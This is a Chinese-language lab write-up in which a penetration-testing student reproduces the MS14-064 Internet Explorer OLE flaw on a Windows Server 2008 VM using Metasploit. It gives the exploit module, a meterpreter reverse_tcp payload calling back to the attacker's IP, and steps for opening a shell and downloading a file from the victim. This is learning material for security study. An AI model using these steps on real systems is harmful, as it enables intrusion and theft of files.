ms14-064漏洞復現
本部落格最先發佈於我的個人部落格,如果方便,煩請移步恰醋的小屋查看,謝謝您!
這是我在實驗室學習滲透測試的第五個漏洞復現,一個多小時便完成了。學長給的要求只需完成查看靶機資訊、在指定位置創建文件夾兩項操作,我在看別的部落格時發現還可以利用該漏洞竊取文件,因此也自己嘗試了以下,寫在了部落格的最後。
漏洞介紹
MS14-064為Windows OLE自動化陣列遠程程式碼執行漏洞。當IE不作訪問記憶體中的對象時,存在遠程程式碼執行漏洞。OLE(對象鏈接與嵌入)是一種允許應用程式共享數據和功能的技術,遠程攻擊者利用此漏洞通過構造的網站執行任意程式碼,用戶使用IE瀏覽器查看該網站時允許遠程執行程式碼。
受影響的產品有:
- Windows Server 2003
- Windows Server 2008
- Windows Server 2008 R2
- Windows Vista
- Windows XP
- Windows 7
- Windows 8
- Windows 8.1
- Windows Server 2012
- Windows Server 2012 R2
- Windows RT
- Windows RT 8.1
實驗環境
攻擊機:Kali Linux: 192.168.227.128
靶機:Windows Server 2008: 192.168.227.130
復現步驟
-
使用
msfconsole
命令啟動msf,搜索ms14-064的漏洞資訊: -
使用第一個攻擊模組,設置載荷
use exploit/windows/browser/ms14_064_ole_code_execution # 使用第一個攻擊模組 show payloads # 查看有效的攻擊載荷 set payload windows/meterpreter/reverse_tcp # 設置反彈連接shell
之後使用
show options
命令查看需要進行的設置。其中,AllowPowershellPrompt、SRVHOST和LHOST需要修改。AllowPowershellPrompt改為true,其餘兩個改為攻擊機IP。設置完成後,使用exploit
命令生成惡意網站。
-
使用靶機用IE瀏覽器打開生成的惡意鏈接
-
返回Kali,已經生成了一個連接session了,按一下回車,輸入
sessions -i 1
連接,入侵靶機,打開shell,如果亂碼,則使用chcp 65001
改變編碼,然後輸入whoami
查看當前用戶。(第一次失敗了,我推斷可能是修改了編碼的原因,因為第二次打開shell後沒有修改編碼,發現成功了,之後又嘗試了修改編碼後輸入whoami
,依然不成功)
-
嘗試在桌面上創建一個名為test的文件夾:
返回windows server 2008查看,桌面上已經出現了相應的文件夾:
-
嘗試從靶機竊取文件
在桌面創建一個名為secret的文件夾:
使用dir命令查看,存在secret.txt文件,返回meterpreter,使用download命令下載文件:
下載完成後,在目標目錄下查看,存在,說明竊取成功: